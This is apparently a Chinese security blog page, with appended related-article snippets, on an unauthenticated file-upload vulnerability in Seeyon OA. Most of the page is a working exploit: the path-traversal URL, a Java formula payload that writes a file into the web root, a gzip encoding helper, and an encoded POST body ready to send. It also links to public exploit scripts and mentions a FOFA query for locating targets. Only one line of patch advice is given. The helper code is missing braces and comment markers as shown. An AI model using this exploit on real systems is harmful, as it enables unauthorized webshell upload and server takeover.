0x02 漏洞利用

1.漏洞url: /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip

2.poc:

[{'formulaType': 1, 'formulaName': 'test', 'formulaExpression': 'String path = "../webapps/seeyon/";
       	java.io.PrintWriter printWriter2 = new java.io.PrintWriter(path+"test.txt");
        String shell = "dGVzdA==";
        sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
        String decodeString = new String(decoder.decodeBuffer(shell),"UTF-8");
        printWriter2.println(decodeString);
        printWriter2.close();};test();def static xxx(){'}, '', {}, 'true']

3.使用下面脚本进行gzip编码：

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.net.URLDecoder;
import java.net.URLEncoder;
import java.util.zip.GZIPInputStream;
import java.util.zip.GZIPOutputStream;
public class Gzip {
     * @param str：正常的字符串 * @return 压缩字符串 类型为：  ³)°K,NIc i£_`Çe#  c¦%ÂXHòjyIÅÖ`     * @throws IOException
    public static String compress(String str) throws IOException {
        if (str == null || str.length() == 0) {
            return str;
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        GZIPOutputStream gzip = new GZIPOutputStream(out);
        gzip.write(str.getBytes());
        gzip.close();
        return out.toString("ISO-8859-1");
     * @param str：类型为： ³)°K,NIc i£_`Çe#  c¦%ÂXHòjyIÅÖ`     * @return 解压字符串  生成正常字符串。     * @throws IOException
    public static String uncompress(String str) throws IOException {
        if (str == null || str.length() == 0) {
            return str;
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        ByteArrayInputStream in = new ByteArrayInputStream(str.getBytes("ISO-8859-1"));
        GZIPInputStream gunzip = new GZIPInputStream(in);
        byte[] buffer = new byte[256];
        int n;
        while ((n = gunzip.read(buffer)) >= 0) {
            out.write(buffer, 0, n);
        }         // toString()使用平台默认编码，也可以显式的指定如toString("GBK")
        return out.toString();
     * @param jsUriStr :字符串类型为：%1F%C2%8B%08%00%00%00%00%00%00%03%C2%B3)%C2%B0K%2CNI%03c%20i%C2%A3_%60%C3%87e%03%11%23%C2%82%0Dc%C2%A6%25%C3%82XH%C3%B2jyI%C3%85%05%C3%96%60%1E%00%17%C2%8E%3Dvf%00%00%00     * @return 生成正常字符串     * @throws IOException
    public static String unCompressURI(String jsUriStr) throws IOException {
        String decodeJSUri = URLDecoder.decode(jsUriStr, "UTF-8");
        String gzipCompress = uncompress(decodeJSUri);
        return gzipCompress;
     * @param strData :字符串类型为： 正常字符串     * @return 生成字符串类型为：%1F%C2%8B%08%00%00%00%00%00%00%03%C2%B3)%C2%B0K%2CNI%03c%20i%C2%A3_%60%C3%87e%03%11%23%C2%82%0Dc%C2%A6%25%C3%82XH%C3%B2jyI%C3%85%05%C3%96%60%1E%00%17%C2%8E%3Dvf%00%00%00     * @throws IOException
    public static String compress2URI(String strData) throws IOException {
        String encodeGzip = compress(strData);
        String jsUriStr = URLEncoder.encode(encodeGzip, "UTF-8");
        return jsUriStr;
原作者文章：https://blog.csdn.net/qq_44934581/article/details/89417205
 
4.post内容：
 
managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uQ%C3%8DK%C3%830%14%3F%C3%AB_%C3%B1%C3%A8%25-%C3%8E%14ED%1C%3Dl8%C2%BD%C2%89%C2%B0%C2%A9%07%C3%B1%10%C3%9BW%17i%C2%93%C2%90%C2%A4%C2%AE%C2%B3%C3%AC%7F7Y%C2%AA-8sy%1Fy%C2%BF%C2%8F%C3%A4%C2%BDt%C2%A4%C2%94%C2%BAn*%C2%B6%C3%9A*%24%C3%97p6%C2%81%C2%9F%C3%8E%3D%C2%AB%7D%C2%87X4%C2%96%0C%C3%ADE%C2%AB4%1A%C3%83%C2%A5%C3%B0%C2%97K%C2%AB%C2%B9x%07%C3%85%C3%AC%1A2%C2%88%28M7%C3%B8%C3%86%C2%942%C2%A9A%C3%9CJ%C2%91F%C3%93c%08%C3%A7%C3%A8%C2%83%7D2%C3%8A%25%7Dp%10%C3%BB%C2%AC%C2%B9E%0Dj%C3%88%C3%8F%1D%C2%81%C3%80%0D%1C%18%C2%8B%3D%C3%BFI%C3%A4%C2%9DP%C3%9B%C3%9A%28%C3%B9%25%C2%85%C3%9E%C2%80YcUy%07%C3%85%C3%9D%C3%93W1%C3%8B%C2%B2A%17L%23h%C3%8DMN%C3%A7%C2%B3%C3%A5%C3%A2%C3%B2%C3%A2%06sY8%C3%A9%C2%A2%C2%8FA%C3%B5%C3%B0P%C3%BCW%29%C3%80%C3%BA%22%60C%11%C3%B7%C2%844%C3%84yS%C2%96%C2%8E%60o%2C%C2%99D%C2%8F%C2%AB%C3%9B%C3%93%C2%AB%C2%B1%C3%B1%C3%B1%C3%8B%C3%A9%C2%BE%C2%A8D%3C%26%C3%BFo6%C2%AF%C2%A4Agl7%C3%B5%C3%BF%C3%A1%C2%92%02K0%C2%96Y%C2%9EC%C3%9B%C2%B6q%C3%92%C2%91%C2%9D%5B%C2%97%5BY%C3%A7%C2%A3%C3%95%0D%C2%92%C3%97o%C2%B2%C2%9A%5B%C2%90%C3%A9%01%00%00
5.上传的文件路径: /seeyon/test.txt
 
6.漏洞利用脚本：
 
       nex1less/seeyon_ajax_exp: 致远OA文件上传漏洞利用脚本 (github.com)
 
7.发现图形化脚本，包括session泄露上传：
 
nex121/SeeyonEXP (github.com)
 
 
0x04 修复建议
 
　　升级到最新版或者打补丁。
 
2020年10-12月安全补丁合集
 
http://service.seeyon.com/patchtools/tp.html#/patchList?type=%E5%AE%89%E5%85%A8%E8%A1%A5%E4%B8%81&id=1
 
                    0x00 漏洞产生原因某远未授权访问分析 - 宽字节安全 - 博客园 (cnblogs.com)0x01影响范围V7,V80x02 漏洞利用1.漏洞url:/seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip2.poc:[{'formulaType': 1, 'formulaName': '...
　　攻防之初，大多为绕过既有逻辑和认证，以Getshell为节点，不管是SQL注入获得管理员数据还是XSS 获得后台cookie，大多数是为了后台的登录权限，假若我们获得一枚口令，都是柳暗花明。不管口令复杂与否，只要在构造的字典内都是爆破之结晶。
　　Web形态及业务之错综，我们暂可将能够自定义...
一、漏洞描述
致远OA是一套办公协同软件。近日，阿里云应急响应中心监控到致远OA ajaxAction 文件上传漏洞利用代码披露。由于致远OA旧版本某些ajax接口存在未授权访问，攻击者通过构造恶意请求，可在无需登录的情况下上传恶意脚本文件，从而控制服务器。
二、影响版本
致远OA V8.0、V8.0SP1
致远OA V7.1、V7.1SP1
三、漏洞复现
POST/seeyon/autoinst..
				
随着中国最大的安全产品性能检测以及人体体能极限挑战活动的到来，各路大佬都八仙过海各显神通。同时大量的0day被公开，排除那些被辟谣的，还有很多值得学习的漏洞。致远这是个组合漏洞，首先任意管理员登陆，然后后台getshell。因为前台漏洞相对来说危害较高，这里着重分析下前台这个漏洞。致远oa使用spring的自动装配，通过在xml文件中搜索漏洞url中的，可以快速定位到漏洞类。
根据exp找到存在问题的方法。
找到该方法后基本上可以一眼看到漏洞点了，在该方法的最下方，这里的memberId是可控的。首先通过
				
网络安全自学日志-漏洞复现篇:致远OA Session泄露 任意文件上传漏洞
文章来自https://www.linuxlz.com/aqld/2104.html
工作中遇到的漏洞，记录一下
漏洞描述
致远OA通过发送特殊请求获取session，在通过文件上传接口上传webshell控制服务器
漏洞影响
致远OA
漏洞复现
FOFA  title=“致远”
首先是一个获取管理cookie的漏洞。然后上传压缩文件进行解压。达到getshell的目的
POST /seeyon/thirdpartyControl
				
漏洞简介
用友U8-OA和致远A6系统getSessionList.jsp文件存在漏洞，攻击者可利用漏洞获取到所有用户的SessionID，利用泄露的SessionID即可登录该用户并获取shell。
漏洞成因
getSessionList.jsp存在缺陷
<%@ page contentType="text/html;charset=GBK"%>
<%@ page session= "false" %>
<%@ page import="net.btdz.oa.ext.htt
0x00 简介
致远OA A8 是一款流行的协同管理软件，在各中、大型企业机构中广泛使用。
由于致远OA旧版本某些接口能被未授权访问，并且部分函数存在过滤不足，攻击者通过构造恶意请求，权限绕过漏洞，可在无需登录的情况下上传恶意脚本文件，从而控制服务器
0x01 影响范围
致远OA V8.0
致远OA V7.1、V7.1SP1
致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3
致远OA V6.0、V6.1SP1、V6.1S